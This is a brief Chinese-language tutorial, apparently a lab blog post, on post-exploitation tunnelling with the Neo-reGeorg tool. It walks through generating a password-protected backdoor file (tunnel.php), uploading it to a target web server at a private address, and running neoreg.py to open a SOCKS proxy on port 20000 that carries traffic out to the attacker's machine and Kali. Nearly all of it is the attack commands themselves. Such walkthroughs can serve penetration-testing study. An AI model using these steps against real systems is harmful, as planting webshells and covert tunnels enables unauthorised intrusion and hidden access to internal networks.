目录
上传工具到攻击机
使用说明
生成后门文件
由于电脑短路无法拖动文件,我就wget发送到目标主机tunnel.php文件
成功上传
可以访问上传的文件
启动代理监听
成功带出
后台私信获取弹药库工具reGeorg
上传工具到攻击机
使用说明
生成后门文件
python3 neoreg.py generate -k crazy #-k crazy 设置密码为crazy
成功上传
可以访问上传的文件
启动代理监听
python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy
python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy -l 0.0.0.0 -p 20000 #-l 0.0.0.0设置监听地址 -p 20000设置监听端口 注意:不要忘记proxychains的修改
可以看到初始是监听127.0.0.1:1080,我们选择改监听地址和端口带出到我们物理机
python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy -l 0.0.0.0 -p 20000
成功带出
配置kali代理,kali也可以正常请求到
